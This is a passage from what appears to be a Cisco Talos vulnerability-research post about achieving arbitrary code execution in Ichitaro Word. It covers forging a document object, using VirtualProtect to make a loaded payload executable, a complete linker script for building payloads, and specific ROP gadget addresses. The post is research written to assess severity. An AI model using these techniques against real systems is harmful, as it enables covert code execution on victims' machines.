After repairing the frame, we still need some way of loading a payload into the address space to mark it as executable and then execute it. Since we hijacked execution after the stream that contained the vulnerability was closed by the application, we'll need some other means to load our code. Fortunately, as we have access to the scope of the stream parsing, we can reuse anything available within the stack to perform this. This is only possible because the JSVDA.DLL module, which contains the necessary functionality to interact with a document object, is at a known address, and the document is stored within the application as a single handle. Thus, only the object's handle and its virtual method table are necessary to forge our own instance of the document object, and we’ll need to reference it to restore the ability to read from the document back to the application.

Revisiting the call stack containing the scope of the document parser to the point where we hijack execution, we need the distance between our saved frame pointer and the field inside the frame for the object_9c2044::method_processStreams_77af0f function at 0x3C1FAF0F which contains the document object. In the following listing, the ap_oframe_0 field contains the document object of type JSVDA::object_OFRM that was passed in from its caller, and then the lp_oframe_230 local variable in the frame maintains a copy of it for the method. Once we've calculated the distance between our current frame pointer and the location of one of these objects, we can simply load the object's handle from its list of properties, and then use it anywhere to access the contents of the loaded document.

Python> callstack = [0x3bbb2de4, 0x3be276be, 0x3be26cb2, 0x3c1faf0f]
Python> pp(listmap(func.name, callstack))
['object_OFRM::openStreamByName?_132de4',
 'object_9c2044::parseStream(DocumentViewStyles,DocumentEditStyles)_3a76be',
 'object_9c2044::parseStream(DocumentEditStyles)_3a6cb2',
 'object_9c2044::method_processStreams_77af0f']

# Convert our callstack into a list of frames.
Python> layout = struc.right(func.frame(callstack[-1]), listmap(func.frame, callstack[:-1]))

# List all frame variables that have a type.
Python> layout[-1].list(typed=True)
[ 4] -254:+0x18  frame_77af0f::field_24c 'lv_struc_24c'      <class 'structure' name='frame_77af0f::field_24c' offset=-0x254 size=0x18>
[ 6] -238:+0x4       JSVDA::object_OFRM* 'lp_oframe_230'     (<class 'type'>, 4)
[ 7] -234:+0x228           object_2f27f8 'lv_object_22c'     <class 'structure' name='object_2f27f8' offset=-0x234 size=0x228>
[11]    0:+0x4       JSVDA::object_OFRM* 'ap_oframe_0'       (<class 'type'>, 4)
[12]    4:+0x4              unsigned int 'av_documentType_4' (<class 'int'>, 4)
[13]    8:+0x4              unsigned int 'av_flags_8'        (<class 'int'>, 4)
[14]    c:+0x4             struc_79aa9a* 'ap_stackobject_c'  (<class 'type'>, 4)
[15]   10:+0x4                       int 'ap_null_10'        (<class 'int'>, 4)

# List all frame variables that reference the object used to read from an opened document.
Python> layout[-1].list(structure=struc.by('JSVDA::object_OFRM'))
[ 6] -238:+0x4 JSVDA::object_OFRM* 'lp_oframe_230' (<class 'type'>, 4)
[11]    0:+0x4 JSVDA::object_OFRM* 'ap_oframe_0'   (<class 'type'>, 4)

In the exploit, we leverage our vulnerability to store an address to the forged object's virtual method table in memory. Thus, to complete the object, we only need to write the handle from the document object that we loaded from farther up our call stack to its correct place after the virtual method table. At this point, we can call any of its methods to use our copy of it. The following listing is the simple layout of this object.

Python>struc.search('*_OFRM').members
<class 'structure' name='JSVDA::object_OFRM' size=0x8>  # [alloc.tag] OFRM
[0] 0+0x4 int 'p_vftable_0' (<class 'int'>, 4)          # [vftable] 0x278186F0
[1] 4+0x4 int 'v_index_4'   (<class 'int'>, 4)          # {'note': 'object_117c5 handle', 'alloc.tag': 'MFCM'}

Afterward, the rest of the process is straightforward. To allocate a page of memory, we use another method within the same module. We copy the original virtual method table back into our forged object and then reuse it to open up an arbitrary stream from the file and return another object for the stream. Using this stream object, we read the contents of the opened stream into the allocated page of memory.

To make this allocated page of memory executable, we reuse a wrapper around one of the imports within the same module to call "VirtualProtect". Finally, we call our stub for the loaded code to initialize the payload and branch to its real entry point. Once the payload completes its execution and returns to us, we set a successful return code so that the 0x3C1FAF0F function believes that the stream was parsed successfully. At this point, our payload is successfully executing in the background and the application has completely rendered the document.

Using a compiler

After the process for loading the desired code into the address space is complete, it is generally publically agreed upon to directly include “shellcode” to maintain execution within the context of the exploited process. Shellcode involves generated or hand-written assembly code that is used to demonstrate control of execution. Alternatively, one can simply leverage open-source compiler tools to implement their payload in a language with higher-level abstractions. This is not only limited to closed-source compilers, however, as one can implement a basic linker with a stub at the entry point of the linked code that is responsible for applying the necessary relocations to its data and then loading the final payload. This is not dissimilar to the reflective DLL injection technique from Stephen Fewer.

The following linker script can be used with the MinGW port of the GNU linker (ld) to emit a contiguous binary that may be loaded into the context of a process. This linker script isolates the entry point from the contiguous pages that need to be mapped as executable and the pages that need to be mapped as writable. After the data and executable code has been properly mapped, an implementer will then need to apply __load_size relocations that are stored between the __load_reloc_start and __load_reloc_stop symbols. If imports are included in the linked target, these end up being stored between the __load_import_start and __load_import_end symbols.

ENTRY(_start)
STARTUP(src/entry.o)
TARGET(pe-i386)

SECTIONS {
    HIDDEN(_loc_counter = .);
    HIDDEN(_loc_align = 0x10);

    .load _loc_counter : {
        __load_start = ABSOLUTE(.);
        KEEP(*(.init))
        KEEP(*(.fini))
        . = ALIGN(_loc_align);

        __load_size = .; LONG(__load_end - __load_start);
        __load_segment_start = .; LONG(__segment_start);
        __load_segment_end = .; LONG(__segment_end);
        __load_reloc_start = .; LONG(__reloc_start);
        __load_reloc_end = .; LONG(__reloc_end);
        __load_import_start = .; LONG(__import_start);
        __load_import_end = .; LONG(__import_end);

        __load_end = ABSOLUTE(.);
        . = ALIGN(_loc_align);
    }
    _loc_counter += SIZEOF(.load);

    .imports _loc_counter : {
        __import_size = ABSOLUTE(.); LONG(__import_end - __import_start);
        __import_start = ABSOLUTE(.);
        *(.idata)
        *(SORT_BY_NAME(.idata$*))
        __import_end = ABSOLUTE(.);

        . = ALIGN(_loc_align);
    }
    _loc_counter += SIZEOF(.imports);

    __segment_start = ABSOLUTE(.);

    .text _loc_counter : {
        *(.text)
        *(SORT_BY_NAME(.text$*))
        *(.text.*)
        . = ALIGN(_loc_align);

        __CTOR_LIST__ = ABSOLUTE(.);
        LONG((__CTOR_END__ - __CTOR_LIST__) / 4 - 2);
        KEEP(*(.ctors));
        KEEP(*(.ctor));
        KEEP(*SORT_BY_NAME(.ctors.*));
        LONG(0);
        __CTOR_END__ = ABSOLUTE(.);

        __DTOR_LIST__ = ABSOLUTE(.);
        LONG((__DTOR_END__ - __DTOR_LIST__) / 4 - 2);
        KEEP(*(.dtors));
        KEEP(*(.dtor));
        KEEP(*SORT_BY_NAME(.dtors.*));
        LONG(0);
        __DTOR_END__ = ABSOLUTE(.);

        . = ALIGN(_loc_align);
    }
    _loc_counter += SIZEOF(.text);

    .data _loc_counter : {
        *(.data)
        *(SORT_BY_NAME(.data$*))
        *(.data.*)
        *(.*data)
        *(.*data.*)

        . = ALIGN(_loc_align);
    }
    _loc_counter += SIZEOF(.data);

    __segment_end = ABSOLUTE(.);

    .relocations _loc_counter : {
        __reloc_size = ABSOLUTE(.); LONG(__reloc_end - __reloc_start);
        __reloc_start = ABSOLUTE(.);
        *(.reloc)
        __reloc_end = ABSOLUTE(.);

        . = ALIGN(_loc_align);
    }
    _loc_counter += SIZEOF(.relocations);

    .bss (NOLOAD) : {
        *(.bss)
        *(COMMON)
    }

    .discarded (NOLOAD) : {
        *(.*)
    }

    __end__ = _loc_counter;
}

By implementing the logic required to map the chosen segments into memory and applying the necessary relocations, dependence on the platform’s runtime linker can be avoided entirely. After this, an implementer can then initialize the runtime for their desired language and develop more complicated payloads in a language that better facilitates their needs.

Alternatively, a linker for the PECOFF object and archive formats is also included with the exploit in case the implementer prefers to use a closed-source compiler for their payload. This linker will take a list of input files and emit a block of binary data that when executed by the exploit will load and execute the implemented payload.

Finishing up

After our loaded code has been successfully executed, we only need to set the %eax register to a correct value to tell the caller that either the stream could not be opened, or it has been opened successfully. After assigning the result, we need to use a regular frame pointer exit to leave the hijacked function and resume execution as if nothing happened. The following two addresses will do exactly that. Because the hijacked frame pointer had previously been repaired before executing our payload, the application will continue to attempt to parse and load the rest of the contents for the document as if nothing terrible has happened.

JSAPRUN.DLL    0x6100e5cf: pop eax; ret;
JSAPRUN.DLL    0x6100104f: leave; ret;

Conclusion

When it comes to exploiting memory corruption vulnerabilities on modern operating systems, the time of generic exploitation techniques is long gone. Exploitation techniques are application-specific and developing them requires a far deeper understanding of their inner workings, often ones that original developers are unaware of due to abstractions of high-level languages. While the presence of an interactive execution environment or a scripting language offers almost limitless exploitation flexibility, in environments like Ichitaro’s an exploit developer has to chain together many different side-effects to achieve a one-shot exploit.

In the case presented, a single vulnerability was abused to ultimately achieve arbitrary code execution. This is often not the case where exploits require chaining multiple vulnerabilities. This often makes it difficult to judge the severity of individual vulnerabilities but exploitation demonstrations like the one presented here develop an equivalence class that enables us to make informed decisions without demonstrating exploitation for every instance.

Cisco Talos Blog

Intelligence Center

Vulnerability Information

Security Resources

Media

Company

Dissecting a complex vulnerability and achieving arbitrary code execution in Ichitaro Word

Table of Contents

Format

Discovery

Mitigations

Leveraging the vulnerability

Vulnerability's capabilities

Hijacking execution

Hijacking frame pointer

Pivoting Stack Pointer

Hijacking execution and using pivot

Generalizations on Instruction Sequence Reuse

Repairing the frame

Loading the contents of a stream

Using a compiler

Finishing up

Conclusion

Related Content

The vulnerabilities we uncovered by fuzzing µC/OS protocol stacks

Fuzzing µCOS protocol stacks, Part 2: Handling multiple requests per test case

Fuzzing µC/OS protocol stacks, Part 1: HTTP server fuzzing

Intelligence Center

Vulnerability Research

Incident Response

Security Resources

Media

Support

Company

Cisco Talos Blog

Dissecting a complex vulnerability and achieving arbitrary code execution in Ichitaro Word

Table of Contents

Format

Discovery

Mitigations

Leveraging the vulnerability

Vulnerability's capabilities

Hijacking execution

Hijacking frame pointer

Pivoting Stack Pointer

Hijacking execution and using pivot

Generalizations on Instruction Sequence Reuse

Repairing the frame

Loading the contents of a stream

Using a compiler

Finishing up

Conclusion

Share this post

Related Content

The vulnerabilities we uncovered by fuzzing µC/OS protocol stacks

Fuzzing µCOS protocol stacks, Part 2: Handling multiple requests per test case

Fuzzing µC/OS protocol stacks, Part 1: HTTP server fuzzing